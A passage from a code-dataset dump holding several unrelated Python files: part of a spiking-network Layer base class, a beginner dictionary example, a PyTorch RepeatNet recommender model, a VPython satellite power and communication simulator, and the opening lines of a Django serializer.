\"\"\"\n Sample input, set up time base\n\n This function checks an input signal, and prepares a discretised time base according to the time step of the current layer\n\n :param Optional[TSContinuous] ts_input: :py:class:`.TSContinuous` of TxM or Tx1 Input signals for this layer\n :param Optional[float] duration: Duration of the desired evolution, in seconds. 
If not provided, then either ``num_timesteps`` or the duration of ``ts_input`` will define the evolution time\n :param Optional[int] num_timesteps: Integer number of evolution time steps, in units of ``.dt``. If not provided, then ``duration`` or the duration of ``ts_input`` will define the evolution time\n\n :return (ndarray, ndarray, int): (time_base, input_steps, num_timesteps)\n time_base: T1 Discretised time base for evolution\n input_steps: (T1xN) Discretised input signal for layer\n num_timesteps: Actual number of evolution time steps, in units of ``.dt``\n \"\"\"\n\n # - Work out how many time steps to take\n num_timesteps = self._determine_timesteps(ts_input, duration, num_timesteps)\n\n # - Generate discrete time base\n time_base = self._gen_time_trace(self.t, num_timesteps)\n\n if ts_input is not None:\n # - Make sure time series is of correct type\n if not isinstance(ts_input, TSContinuous):\n raise TypeError(\n self.start_print\n + \"`ts_input` must be of type `TSContinuous` or `None`.\"\n )\n\n # - Make sure time_base matches ts_input\n t_start_expected = time_base[0]\n t_stop_expected = time_base[-1]\n if not ts_input.periodic:\n # - If time base limits are very slightly beyond ts_input.t_start and ts_input.t_stop, match them\n if (\n ts_input.t_start - 1e-3 * self.dt\n <= t_start_expected\n <= ts_input.t_start\n ):\n t_start_expected = ts_input.t_start\n if (\n ts_input.t_stop\n <= t_stop_expected\n <= ts_input.t_stop + 1e-3 * self.dt\n ):\n t_stop_expected = ts_input.t_stop\n\n # - Warn if evolution period is not fully contained in ts_input\n if not (ts_input.contains(time_base) or ts_input.periodic):\n warn(\n \"Layer `{}`: Evolution period (t = {} to {}) \".format(\n self.name, t_start_expected, t_stop_expected\n )\n + \"is not fully contained in input signal (t = {} to {}).\".format(\n ts_input.t_start, ts_input.t_stop\n )\n + \" You may need to use a `periodic` time series.\"\n )\n\n # - Sample input trace and check for correct dimensions\n input_steps = self._check_input_dims(ts_input(time_base))\n\n # - Treat \"NaN\" as zero inputs\n input_steps[np.where(np.isnan(input_steps))] = 0\n\n else:\n # - Assume zero inputs\n input_steps = np.zeros((num_timesteps, self.size_in))\n\n return time_base, input_steps, num_timesteps\n\n def _prepare_input_events(\n self,\n ts_input: Optional[TSEvent] = None,\n duration: Optional[float] = None,\n num_timesteps: Optional[int] = None,\n ) -> Tuple[np.ndarray, np.ndarray, int]:\n \"\"\"\n Sample input from a :py:class:`TSEvent` time series, set up evolution time base\n\n This function checks an input signal, and prepares a discretised time base according to the time step of the current layer\n\n :param Optional[TSEvent] ts_input: TimeSeries of TxM or Tx1 Input signals for this layer\n :param Optional[float] duration: Duration of the desired evolution, in seconds. If not provided, then either ``num_timesteps`` or the duration of ``ts_input`` will determine evolution itme\n :param Optional[int] num_timesteps: Number of evolution time steps, in units of ``.dt``. If not provided, then either ``duration`` or the duration of ``ts_input`` will determine evolution time\n\n :return (ndarray, ndarray, int):\n time_base: T1X1 vector of time points -- time base for the rasterisation\n spike_raster: Boolean or integer raster containing spike information. 
T1xM array\n num_timesteps: Actual number of evolution time steps, in units of ``.dt``\n \"\"\"\n\n # - Work out how many time steps to take\n num_timesteps = self._determine_timesteps(ts_input, duration, num_timesteps)\n\n # - Generate discrete time base\n time_base = self._gen_time_trace(self.t, num_timesteps)\n\n # - Extract spike timings and channels\n if ts_input is not None:\n # - Make sure time series is of correct type\n if not isinstance(ts_input, TSEvent):\n raise TypeError(\n self.start_print + \"`ts_input` must be of type `TSEvent` or `None`.\"\n )\n\n # Extract spike data from the input variable\n spike_raster = ts_input.raster(\n dt=self.dt,\n t_start=self.t,\n num_timesteps=np.size(time_base),\n channels=np.arange(self.size_in),\n add_events=(self.add_events if hasattr(self, \"add_events\") else False),\n )\n\n else:\n spike_raster = np.zeros((np.size(time_base), self.size_in))\n\n # - Check for correct input dimensions\n spike_raster = self._check_input_dims(spike_raster)\n\n return time_base, spike_raster, num_timesteps\n\n def _check_input_dims(self, inp: np.ndarray) -> np.ndarray:\n \"\"\"\n Verify that the dimensions of an input match this layer instance\n\n If input dimension == 1, scale it up to self._size_in by repeating signal.\n\n :param ndarray inp: ArrayLike containing input data\n\n :return ndarray: ``inp``, possibly with dimensions repeated\n \"\"\"\n # - Replicate input data if necessary\n if inp.ndim == 1 or (inp.ndim > 1 and inp.shape[1] == 1):\n if self.size_in > 1:\n warn(\n f\"Layer `{self.name}`: Only one channel provided in input - will \"\n + f\"be copied to all {self.size_in} input channels.\"\n )\n inp = np.repeat(inp.reshape((-1, 1)), self._size_in, axis=1)\n else:\n # - Check dimensionality of input\n assert (\n inp.shape[1] == self._size_in\n ), \"Layer `{}`: Input dimensionality {} does not match layer input size {}.\".format(\n self.name, inp.shape[1], self._size_in\n )\n\n # - Return possibly corrected input\n return inp\n\n def _gen_time_trace(self, t_start: float, num_timesteps: int) -> np.ndarray:\n \"\"\"\n Generate a time trace starting at ``t_start``, of length ``num_timesteps`` with time step length :py:attr:`._dt`\n\n :param float t_start: Start time, in seconds\n :param int num_timesteps: Number of time steps to generate, in units of ``.dt``\n\n :return (ndarray): Generated time trace\n \"\"\"\n # - Generate a trace\n time_trace = np.arange(num_timesteps) * self.dt + t_start\n\n return time_trace\n\n def _expand_to_shape(\n self, inp, shape: tuple, var_name: str = \"input\", allow_none: bool = True\n ) -> np.ndarray:\n \"\"\"\n Replicate out a scalar to an array of shape ``shape``\n\n :param Any inp: scalar or array-like of input data\n :param Tuple[int] shape: tuple defining array shape that input should be expanded to\n :param Optional[str] var_name: Name of the variable to include in error messages. Default: \"input\"\n :param Optional[bool] allow_none: If ``True``, then ``None`` is permitted as argument for ``inp``. Otherwise an error will be raised. 
Default: ``True``, allow ``None``\n\n :return ndarray: ``inp``, replicated to the correct shape\n\n :raises AssertionError: If ``inp`` is shaped incompatibly to be replicated to the desired shape\n :raises AssertionError: If ``inp`` is ``None`` and ``allow_none`` is ``False``\n \"\"\"\n if not allow_none:\n assert inp is not None, \"Layer `{}`: `{}` must not be None\".format(\n self.name, var_name\n )\n\n total_size = reduce(lambda m, n: m * n, shape)\n\n if np.size(inp) == 1:\n # - Expand input to full size\n inp = np.repeat(inp, total_size)\n\n assert (\n np.size(inp) == total_size\n ), \"Layer `{}`: `{}` must be a scalar or have {} elements\".format(\n self.name, var_name, total_size\n )\n\n # - Return object of correct shape\n return np.reshape(inp, shape)\n\n def _expand_to_size(\n self, inp, size: int, var_name: str = \"input\", allow_none: bool = True\n ) -> np.ndarray:\n \"\"\"\n Replicate out a scalar to a desired size\n\n :param Any inp: scalar or array-like\n :param int size: Size that input should be expanded to\n :param Optional[str] var_name: Name of the variable to include in error messages. Default: \"input\"\n :param Optional[bool] allow_none: If ``True``, allow None as a value for ``inp``. Otherwise an error will be raised. Default: ``True``, allow ``None``\n\n :return ndarray: Array of ``inp``, possibly expanded to the desired size\n\n :raises AssertionError: If ``inp`` is incompatibly shaped to expand to the desired size\n :raises AssertionError: If ``inp`` is ``None`` and ``allow_none`` is ``False``\n \"\"\"\n return self._expand_to_shape(inp, (size,), var_name, allow_none)\n\n def _expand_to_net_size(\n self, inp, var_name: str = \"input\", allow_none: bool = True\n ) -> np.ndarray:\n \"\"\"\n Replicate out a scalar to the size of the layer\n\n :param Any inp: scalar or array-like\n :param Optional[str] var_name: Name of the variable to include in error messages. Default: \"input\"\n :param Optional[bool] allow_none: If ``True``, allow ``None`` as a value for ``inp``. Otherwise an error will be raised. Default: ``True``, allow ``None``\n\n :return ndarray: Values of ``inp``, replicated out to the size of the current layer\n\n :raises AssertionError: If ``inp`` is incompatibly sized to replicate out to the layer size\n :raises AssertionError: If ``inp`` is ``None``, and ``allow_none`` is ``False``\n \"\"\"\n return self._expand_to_shape(inp, (self.size,), var_name, allow_none)\n\n def _expand_to_weight_size(\n self, inp, var_name: str = \"input\", allow_none: bool = True\n ) -> np.ndarray:\n \"\"\"\n Replicate out a scalar to the size of the layer's weights\n\n :param Any inp: scalar or array-like\n :param Optional[str] var_name: Name of the variable to include in error messages. Default: \"input\"\n :param Optional[bool] allow_none: If ``True``, allow ``None`` as a value for ``inp``. Otherwise an error will be raised. 
Default: ``True``, allow ``None``\n\n :return ndarray: Values of ``inp``, replicated out to the size of the current layer\n\n :raises AssertionError: If ``inp`` is incompatibly sized to replicate out to the layer size\n :raises AssertionError: If ``inp`` is ``None``, and ``allow_none`` is ``False``\n \"\"\"\n return self._expand_to_shape(inp, (self.size, self.size), var_name, allow_none)\n\n ### --- String representations\n\n def __str__(self):\n return '{} object: \"{}\" [{} {} in -> {} internal -> {} {} out]'.format(\n self.__class__.__name__,\n self.name,\n self.size_in,\n self.input_type.__name__,\n self.size,\n self.size_out,\n self.output_type.__name__,\n )\n\n def __repr__(self):\n return self.__str__()\n\n ### --- State evolution methods\n\n @abstractmethod\n def evolve(\n self,\n ts_input: Optional[TimeSeries] = None,\n duration: Optional[float] = None,\n num_timesteps: Optional[int] = None,\n ) -> TimeSeries:\n \"\"\"\n Abstract method to evolve the state of this layer\n\n This method must be overridden to produce a concrete :py:class:`Layer` subclass. The :py:class:`evolve` method is the main interface for simulating a layer. It must accept an input time series which determines the signals injected into the layer as input, and return an output time series representing the output of the layer.\n\n :param Optional[TimeSeries] ts_input: (TxM) External input trace to use when evolving the layer\n :param Optional[float] duration: Duration in seconds to evolve the layer. If not provided, then ``num_timesteps`` or the duration of ``ts_input`` is used to determine evolution time\n :param Optional[int] num_timesteps: Number of time steps to evolve the layer, in units of ``.dt``. If not provided, then ``duration`` or the duration of ``ts_input`` is used to determine evolution time\n\n :return TimeSeries: (TxN) Output of this layer\n \"\"\"\n pass\n\n # @abstractmethod\n # def stream(self,\n # duration: float,\n # dt: float,\n # verbose: bool = False,\n # ) -> TimeSeries:\n # \"\"\"\n # stream - Abstract method to evolve the state of this layer, in a streaming format\n #\n # :param duration: float Total duration to be streamed\n # :param dt: float Streaming time-step (multiple of layer.dt)\n #\n # :yield TimeSeries raw tuple representation on each time step\n # \"\"\"\n # pass\n\n def reset_time(self):\n \"\"\"\n Reset the internal clock of this layer to 0\n \"\"\"\n self._timestep = 0\n\n def randomize_state(self):\n \"\"\"\n Randomize the internal state of this layer\n\n Unless overridden, this method randomizes the layer state based on the current state, using a Normal distribution with std. dev. of 2% of the magnitude of the current state values\n \"\"\"\n # create a random initial state from a Gaussian centred on the current state, with std. dev. of 2% of its absolute value\n self.state = np.random.normal(\n self.state, np.abs(self.state) * 0.02, size=(self.size,)\n )\n\n def reset_all(self):\n \"\"\"\n Reset both the internal clock and the internal state of the layer\n \"\"\"\n self.reset_time()\n self.reset_state()\n\n @abstractmethod\n def to_dict(self) -> Dict:\n \"\"\"\n Convert parameters of this layer to a dict if they are relevant for reconstructing an identical layer\n\n The base class :py:class:`.Layer` configures the dictionary, by storing attributes :py:attr:`~.Layer.weights`; :py:attr:`~.Layer.dt`; :py:attr:`~.Layer.noise_std`; :py:attr:`~.Layer.name`; and :py:attr:`~.Layer.class_name`. 
To enable correct saving / loading of your derived :py:class:`.Layer` subclass, you should first call :py:meth:`self.super().to_dict` and then store all additional arguments to :py:meth:`__init__` required by your class to instantiate an identical object.\n\n :return Dict: A dictionary that can be used to reconstruct the layer\n \"\"\"\n config = {}\n if isinstance(self.weights, np.ndarray):\n config[\"weights\"] = self.weights.tolist()\n else:\n config[\"weights\"] = self.weights\n\n config[\"dt\"] = self.dt\n config[\"noise_std\"] = self.noise_std\n config[\"name\"] = self.name\n\n config[\"class_name\"] = self.class_name\n\n return config\n\n def save(self, config: Dict, filename: str):\n \"\"\"\n Save a set of parameters to a ``json`` file\n\n :param Dict config: Dictionary of attributes to be saved\n :param str filename: Path of file where parameters are stored\n \"\"\"\n with open(filename, \"w\") as f:\n json.dump(config, f)\n\n def save_layer(self, filename: str):\n \"\"\"\n Obtain layer parameters from `.to_dict` and save in a ``json`` file\n\n :param str filename: Path of file where parameters are to be stored\n \"\"\"\n config = self.to_dict()\n assert isinstance(config, dict), (\n self.start_print\n + \"This should not have happened. If you encounter this statement, please contact \"\n + f\"the developers of this package. ({self.class_name})\"\n )\n self.save(config, filename)\n\n @classmethod\n def load_from_file(cls: Any, filename: str, **kwargs) -> \"cls\":\n \"\"\"\n Generate an instance of a :py:class:`.Layer` subclass, with parameters loaded from a file\n\n :param Any cls: A :py:class:`.Layer` subclass. This class will be used to reconstruct a layer based on the parameters stored in `filename`\n :param str filename: Path to the file where parameters are stored\n :param kwargs: Any keyword arguments of the class `.__init__` method where the parameter stored in the file should be overridden\n\n :return `.Layer`: Instance of `.Layer` subclass with parameters loaded from ``filename``\n \"\"\"\n # - Load dict from file\n with open(filename, \"r\") as f:\n config = json.load(f)\n\n # - Instantiate new class member from dict\n return cls.load_from_dict(config, **kwargs)\n\n @classmethod\n def load_from_dict(cls: Any, config: Dict, **kwargs) -> \"cls\":\n \"\"\"\n Generate instance of a :py:class:`.Layer` subclass with parameters loaded from a dictionary\n\n :param Any cls: A :py:class:`.Layer` subclass. 
This class will be used to reconstruct a layer based on the parameters stored in ``filename``\n :param Dict config: Dictionary containing parameters of a :py:class:`.Layer` subclass\n :param kwargs: Any keyword arguments of the class :py:meth:`.__init__` method where the parameters from ``config`` should be overridden\n\n :return `.Layer`: Instance of `.Layer` subclass with parameters from ``config``\n \"\"\"\n # - Overwrite parameters with kwargs\n config = dict(config, **kwargs)\n\n # - Remove class name from dict\n config.pop(\"class_name\")\n return cls(**config)\n\n def reset_state(self):\n \"\"\"\n Reset the internal state of this layer\n\n Sets `.state` attribute to all zeros\n \"\"\"\n self.state = np.zeros(self.size)\n\n #### --- Properties\n\n @property\n def class_name(self) -> str:\n \"\"\"\n (str) Class name of ``self``\n \"\"\"\n # - Determine class name by removing \"<class '\" and \"'>\" and the package information\n return str(self.__class__).split(\"'\")[1].split(\".\")[-1]\n\n @property\n def start_print(self):\n \"\"\"\n (str) Return a string containing the layer subclass name and the layer `.name` attribute\n \"\"\"\n return f\"{self.class_name} '{self.name}': \"\n\n @property\n def output_type(self):\n \"\"\"\n (Type[TimeSeries]) Output :py:class:`.TimeSeries` subclass emitted by this layer.\n \"\"\"\n return TSContinuous\n\n @property\n def input_type(self):\n \"\"\"\n (Type[TimeSeries]) Input :py:class:`.TimeSeries` subclass accepted by this layer.\n \"\"\"\n return TSContinuous\n\n @property\n def size(self) -> int:\n \"\"\"\n (int) Number of units in this layer (N)\n \"\"\"\n return self._size\n\n @property\n def size_in(self) -> int:\n \"\"\"\n (int) Number of input channels accepted by this layer (M)\n \"\"\"\n return self._size_in\n\n @property\n def size_out(self) -> int:\n \"\"\"\n (int) Number of output channels produced by this layer (O)\n \"\"\"\n return self._size_out\n\n @property\n def dt(self) -> float:\n \"\"\"\n (float) Simulation time step of this layer\n \"\"\"\n return self._dt\n\n @dt.setter\n def dt(self, fNewDt: float):\n self._dt = to_scalar(fNewDt)\n\n @property\n def weights(self) -> np.ndarray:\n \"\"\"\n (ndarray) Weights encapsulated by this layer (MxN)\n \"\"\"\n return self._weights\n\n @weights.setter\n def weights(self, new_w: np.ndarray):\n assert new_w is not None, \"Layer `{}`: weights must not be None.\".format(\n self.name\n )\n\n # - Ensure weights are at least 2D\n try:\n assert new_w.ndim >= 2\n except AssertionError:\n warn(\"Layer `{}`: `new_w` must be at least of dimension 2\".format(self.name))\n new_w = np.atleast_2d(new_w)\n\n # - Check dimensionality of new weights\n if new_w.size != self.size_in * self.size:\n raise ValueError(\n self.start_print\n + f\"`new_w` must be of shape {(self.size_in, self.size)}\"\n )\n\n # - Save weights with appropriate size\n self._weights = np.reshape(new_w, (self.size_in, self.size))\n\n @property\n def state(self):\n \"\"\"\n (ndarray) Internal state of this layer (N)\n \"\"\"\n return self._state\n\n @state.setter\n def state(self, new_state):\n assert (\n np.size(new_state) == self.size\n ), \"Layer `{}`: `new_state` must have {} elements\".format(self.name, self.size)\n\n self._state = new_state\n\n @property\n def noise_std(self):\n \"\"\"\n (float) Noise injected into the state of this layer during evolution\n\n This value represents the standard deviation of a white noise process. 
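In a discrete-time simulation this typically means drawing each step's noise with std. dev. noise_std * sqrt(dt), so that the variance accumulates to noise_std**2 over one second of integration.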
When subclassing :py:class:`Layer`, this value should be corrected by the :py:attr:`.dt` attribute\n \"\"\"\n return self._noise_std\n\n @noise_std.setter\n def noise_std(self, new_noise_std):\n self._noise_std = to_scalar(new_noise_std)\n\n @property\n def t(self):\n \"\"\"\n (float) The current evolution time of this layer\n \"\"\"\n return self._timestep * self.dt\n\n @t.setter\n def t(self, new_t):\n self._timestep = int(np.floor(new_t / self.dt))\n\n # - Temporary, for maintaining compatibility with layers that still use _t\n @property\n def _t(self):\n return self._timestep * self.dt\n\n @_t.setter\n def _t(self, new_t):\n self._timestep = int(np.floor(new_t / self.dt))\n","repo_name":"synsense/rockpool","sub_path":"rockpool/nn/layers/layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":30138,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"3"} +{"seq_id":"23043675911","text":"'''\n dictionary : a collection which contains key-value pairs\n\n syntax : \n\n dictionary_name = {\n \"key\" : value,\n \"key2\": value,\n .\n .\n }\n'''\n\n# student dictionary here.\nstudent={\n \"name\":\"raj\",\n \"subject\" : \"python\",\n \"mark\" : 85,\n}\n\nprint(student)\n\n# display the dictionary in a properly formatted way\n\nfor k,v in student.items():\n print(f\"{k} = {v}\")","repo_name":"RKPatel24/R.K_Patel","sub_path":"Python/Daily Task/Python/dicitionary_example.py","file_name":"dicitionary_example.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16026834962","text":"import torch.nn as nn\nfrom torch.nn.parameter import Parameter\nimport torch\nimport torch.nn.functional as F\nfrom Common.BilinearAttention import *\n\ndef gru_forward(gru, input, lengths, state=None, batch_first=True):\n gru.flatten_parameters()\n input_lengths, perm = torch.sort(lengths, descending=True)\n\n input = input[perm]\n if state is not None:\n state = state[perm].transpose(0, 1).contiguous()\n\n total_length=input.size(1)\n if not batch_first:\n input = input.transpose(0, 1) # B x L x N -> L x B x N\n packed = torch.nn.utils.rnn.pack_padded_sequence(input, input_lengths, batch_first)\n\n outputs, state = gru(packed, state)\n outputs, output_lengths = torch.nn.utils.rnn.pad_packed_sequence(outputs, batch_first=batch_first, total_length=total_length) # unpack (back to padded)\n\n _, perm = torch.sort(perm, descending=False)\n if not batch_first:\n outputs = outputs.transpose(0, 1)\n outputs=outputs[perm]\n state = state.transpose(0, 1)[perm]\n\n return outputs, state\n\ndef build_map(b_map, max=None):\n batch_size, b_len = b_map.size()\n if max is None:\n max=b_map.max() + 1\n if torch.cuda.is_available():\n b_map_ = torch.cuda.FloatTensor(batch_size, b_len, max).fill_(0)\n else:\n b_map_ = torch.zeros(batch_size, b_len, max)\n b_map_.scatter_(2, b_map.unsqueeze(2), 1.)\n # b_map_[:, :, 0] = 0.\n b_map_.requires_grad=False\n return b_map_\n\nclass RepeatNet(nn.Module):\n def __init__(self, embedding_size, hidden_size, item_vocab_size):\n super(RepeatNet, self).__init__()\n\n self.embedding_size=embedding_size\n self.hidden_size=hidden_size\n self.item_vocab_size=item_vocab_size\n\n self.item_emb = nn.Embedding(item_vocab_size, embedding_size, padding_idx=0)\n\n self.enc = nn.GRU(embedding_size, int(hidden_size / 2), num_layers=1, bidirectional=True, batch_first=True)\n\n self.mode_attn = BilinearAttention(hidden_size, hidden_size, hidden_size)\n self.mode=nn.Linear(hidden_size, 2)\n\n self.repeat_attn 
= BilinearAttention(hidden_size, hidden_size, hidden_size)\n self.explore_attn = BilinearAttention(hidden_size, hidden_size, hidden_size)\n self.explore = nn.Linear(hidden_size, item_vocab_size)\n\n def model(self, data):\n batch_size=data['item_seq'].size(0)\n mask = data['item_seq'].ne(0)\n lengths = mask.float().sum(dim=-1).long()\n\n item_seq_embs = F.dropout(self.item_emb(data['item_seq']), p=0.5, training=self.training)\n\n output, state = gru_forward(self.enc, item_seq_embs, lengths, batch_first=True)\n state = F.dropout(state, p=0.5, training=self.training)\n output = F.dropout(output, p=0.5, training=self.training)\n\n explore_feature, attn, norm_attn = self.explore_attn(state.reshape(batch_size, -1).unsqueeze(1), output, output, mask=mask.unsqueeze(1))\n p_explore = self.explore(explore_feature.squeeze(1))\n explore_mask=torch.bmm((data['item_seq']>0).float().unsqueeze(1), data['source_map']).squeeze(1)\n p_explore = p_explore.masked_fill(explore_mask.bool(), float('-inf')) # not sure we need to mask this out, depends on experiment results\n p_explore = F.softmax(p_explore, dim=-1)\n\n _, p_repeat = self.repeat_attn.score(state.reshape(batch_size, -1).unsqueeze(1), output, mask=mask.unsqueeze(1))\n p_repeat=torch.bmm(p_repeat, data['source_map']).squeeze(1)\n\n mode_feature, attn, norm_attn = self.mode_attn(state.reshape(batch_size, -1).unsqueeze(1), output, output, mask=mask.unsqueeze(1))\n p_mode=F.softmax(self.mode(mode_feature.squeeze(1)), dim=-1)\n\n p = p_mode[:, 0].unsqueeze(-1)*p_explore + p_mode[:, 1].unsqueeze(-1)*p_repeat\n\n return p\n\n def do_train(self, data):\n scores=self.model(data)\n loss = F.nll_loss((scores+1e-8).log(), data['item_tgt'].reshape(-1), ignore_index=0)#0 is used as padding\n return loss\n\n def do_infer(self, data):\n scores = self.model(data)\n scores, index=torch.sort(scores, dim=-1, descending=True)\n return scores, index\n\n def forward(self, data, method='train'):\n data['source_map'] = build_map(data['item_seq'], max=self.item_vocab_size)\n if method == 'train':\n return self.do_train(data)\n elif method == 'infer':\n return self.do_infer(data)","repo_name":"PengjieRen/RepeatNet-pytorch","sub_path":"RepeatNet/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":4358,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"3"} +{"seq_id":"12718336709","text":"from utils import *\nfrom visual import *\nimport numpy as np\n\nclass AxisVis(frame):\n \"\"\"Visualize a set of 3d axes as colored perpendicular arrows.\"\"\"\n def __init__(self,arrowlen,shaftwidth='auto',pos=(0,0,0),standard=True):\n frame.__init__(self)\n if standard:\n x=(arrowlen,0,0)\n y=(0,arrowlen,0)\n z=(0,0,arrowlen)\n self.pos = pos\n if shaftwidth == 'auto':\n shaftwidth = max(arrowlen/100,2e4)\n self.arrows={}\n self.arrows['x'] = arrow(frame=self,axis=x,color=color.green)\n self.arrows['y'] = arrow(frame=self,axis=y,color=color.red)\n self.arrows['z'] = arrow(frame=self,axis=z,color=color.blue)\n for a in self.arrows.values():\n a.shaftwidth = shaftwidth\n\n\nclass SatVis(AxisVis):\n \"\"\"Visualize the orientation and field of view of a satellite. Probably a temporary class.
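\n The displayed cone radius follows from the half-angle geometry used below: r = length * tan(gain / 2), and likewise r_cam = length * tan(cam_gain / 2) for the camera pyramid.\n 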
\"\"\"\n def __init__(self,gain,length,arrowlen,shaftwidth='auto',cam_gain=0,pos=(0,0,0),standard=True):\n AxisVis.__init__(self,arrowlen,shaftwidth,pos,standard)\n r = np.tan(gain/2) * length\n a = np.asarray(self.arrows['x'].axis)\n r_cam = np.tan(cam_gain/2)*length\n self.ax = a\n self.length = length\n self.gain = gain\n self.cam_gain=cam_gain\n a/=mag(a)\n self.fov_cone=cone(frame=self,length=length,radius=r,axis=-a,opacity=0.15, pos=a*length,color=color.orange)\n self.camera_pyramid = pyramid(frame=self,axis=-a,size=(length,r_cam,1e5),pos=a*length,color=color.blue,opacity=0.3)\n self.mainbox = box(frame=self,pos=(0,0,0),size=(1e5,1e5,1e5))\n\n def set_gain(self,gain):\n self.gain = gain\n r = np.tan(gain / 2) * self.length\n self.fov_cone.radius = r\n\n def set_cam_gain(self,gain):\n self.cam_gain = gain\n r = np.tan(gain / 2) * self.length\n csize = self.camera_pyramid.size\n csize[1] = r\n self.camera_pyramid.size = csize\n\n def set_length(self,new_length):\n \"\"\"Set the length of the displayed cone/pyramids \"\"\"\n self.length = new_length\n self.camera_pyramid.pos = self.ax*self.length\n self.fov_cone.length = new_length\n self.camera_pyramid.length=new_length\n self.fov_cone.pos = self.ax*self.length\n self.set_gain(self.gain)\n self.set_cam_gain(self.cam_gain)\n\nclass Satellite(object):\n \"\"\"Satellite utility class\"\"\"\n def __init__(self,orbit,earth,capacity=35400.0,orientation=(1,0,0),timestep=1,\n mass=8,dim=(0.1,0.2,0.3),antenna_gain=0):\n self.orbit = orbit\n self.earth = earth\n self.t = 0\n self.current_orient = orientation\n self.current_coord = self.orbit.r0\n self.spanel_offset = np.asarray((-1,0,1))\n self.efficiency = 0.21\n self.area = 0.3 * 0.1 #area of solar panel in square metres\n self.timestep = timestep\n self.antenna_gain = antenna_gain\n self.cam_gain = 0\n self.currently_collecting = True\n self.currently_transmitting = {}#dict to store all locations tras\n self.capacity = capacity\n self.current_battery = capacity\n self.mass = mass #satellite mass in kg\n self.dim = np.asarray(dim)#dimensions of cuboid satellite in metres\n\n\n def energy_recieved(self):\n \"\"\"Gives the energy recieved at time t with orbit orbit. 
\"\"\"\n radiance = self.orbit.radiance_at_coord(self.current_coord,self.t)\n sundir=self.orbit.sun_coords_at(self.t)\n sat_to_sun = sundir - self.current_coord\n solar_orient = self.current_orient + self.spanel_offset\n p = np.dot(sundir,solar_orient)/(mag(sundir)*mag(solar_orient))\n #p = np.cos(angle_between(sundir,solar_orient))\n #p=1\n p=abs(p)\n p*= radiance\n #print(\"dot product:{}\".format(p))\n p *= self.efficiency\n p *= self.area\n #print(\"final power:\"+str(p))\n e = p * self.timestep\n return e\n\n def energy_used(self):\n p = 1 #1 watt intermittent power use\n if self.currently_transmitting != {}:\n p += 5\n if self.currently_collecting:\n p += 3\n e = p * self.timestep\n return e\n\n def power_balance(self):\n self.e_in = self.energy_recieved()\n\n self.e_out = self.energy_used()\n #print(\"e_in: {}, e_out: {}\".format(self.e_in,self.e_out))\n self.current_battery += (self.e_in - self.e_out)\n #print(self.current_battery)\n if self.current_battery > self.capacity:\n self.current_battery = self.capacity\n if self.current_battery <= 0:\n pass\n\n def communication_possible(self,coord):\n \"\"\"Determines if the satellite can make contact with a given coord\"\"\"\n\n sat_to_coord = np.asarray(coord) - self.current_coord#vector from satellite to coord\n if angle_between(self.current_orient, sat_to_coord) <= self.antenna_gain/2:\n if not passes_through_earth(self.current_coord,coord):\n return True\n return False\n\n def simulate_comms(self):\n \"\"\"Recompute which ground sites the satellite can currently transmit to.\"\"\"\n self.currently_transmitting = {}\n for place in self.earth.labels.keys():\n place_coord = self.earth.frame.frame_to_world(self.earth.labels[place].pos)\n if self.communication_possible(place_coord):\n self.currently_transmitting[place] = place_coord\n\n def perform_timestep(self):\n \"\"\"Do one timestep and update the satellite's state. 
\"\"\"\n self.current_coord = np.asarray(self.orbit.t_to_xyz(self.t))\n self.simulate_comms()\n #TEMPORARY - REPLACE WITH POLICY SETTER SOON.\n #(this just always points to earth's center)\n self.current_orient = np.asarray(self.current_coord) * -1\n self.power_balance()\n self.t += self.timestep\n\n\n\n\n\nclass SatelliteVis(Satellite):\n def __init__(self,orbit,earth,capacity=35400,orientation=(1,0,0),timestep=1,\n mass=8,dim=(0.1,0.2,0.3),antenna_gain=0):\n Satellite.__init__(self,orbit,earth,capacity,orientation,timestep,mass,dim,antenna_gain)\n self.vis = SatVis(length=orbit.a,gain=self.antenna_gain,pos=self.orbit.r0,arrowlen=5e5)\n self.comm_lines = {}\n self.display_string = \"Ready for use\"\n self.hud = label(pos=(0,0,0),xoffset=-310,yoffset=100,text=self.display_string,line=False)\n self.e_in=0\n self.e_out=0\n\n def perform_timestep(self):\n super(SatelliteVis,self).perform_timestep()\n #self.vis.pos = self.current_coord\n self.vis.axis = self.current_orient\n self.set_pos(self.current_coord)\n #delete any lines from other timesteps\n #draw line from satellite to any points making communication\n for line in self.comm_lines.values():\n line.visible=False\n\n for place in self.currently_transmitting.keys():\n place_coord = self.currently_transmitting[place]\n self.comm_lines[place] = curve(pos=[self.current_coord, place_coord],\n color=color.cyan)\n self.hud.text = self.get_display_string()\n\n def get_display_string(self):\n disp_string = 'Date/time: ' + str(self.earth.datetime_at(self.t))\n disp_string += \"\\nCurrent coord:{:.0f} {:.0f} {:.0f} \".format(*self.current_coord)\n disp_string += \"\\nBattery: {:.1f}%\".format(self.current_battery/self.capacity * 100)\n disp_string += \"\\nPower in: {:.1f} W\".format(self.e_in/self.timestep)\n disp_string += \"\\nPower used: {} W\".format(self.e_out / self.timestep)\n\n if self.currently_transmitting == {}:\n disp_string += \"\\nNo communication with earth.\"\n else:\n disp_string += \"\\nTransmitting data to points:\"\n for place in self.currently_transmitting.keys():\n disp_string += \"\\n \" + place\n return disp_string\n\n def set_gain(self,gain):\n self.antenna_gain = gain\n self.vis.set_gain(gain)\n\n def set_cam_gain(self,gain):\n self.cam_gain=gain\n self.vis.set_cam_gain(gain)\n\n def set_pos(self,new_pos):\n self.vis.pos = new_pos\n self.current_coord = new_pos\n #if self.t % self.timestep * 150 == 0:\n # self.vis.set_length(mag(self.current_coord))\n\n def set_orbit(self,new_orbit):\n self.orbit = new_orbit\n self.set_pos(self.orbit.t_to_xyz(self.t))\n\n def toggle_collection(self):\n self.currently_collecting = not self.currently_collecting\n self.vis.camera_pyramid.visible = not self.vis.camera_pyramid.visible\n","repo_name":"sorenbouma/Python-Orbit-Visualization","sub_path":"sat.py","file_name":"sat.py","file_ext":"py","file_size_in_byte":8646,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"17323562983","text":"from django.core.exceptions import ValidationError\nfrom django.core.validators import MinLengthValidator, URLValidator\nfrom rest_framework import serializers\n\nfrom trcustoms.common.fields import CustomCharField\nfrom 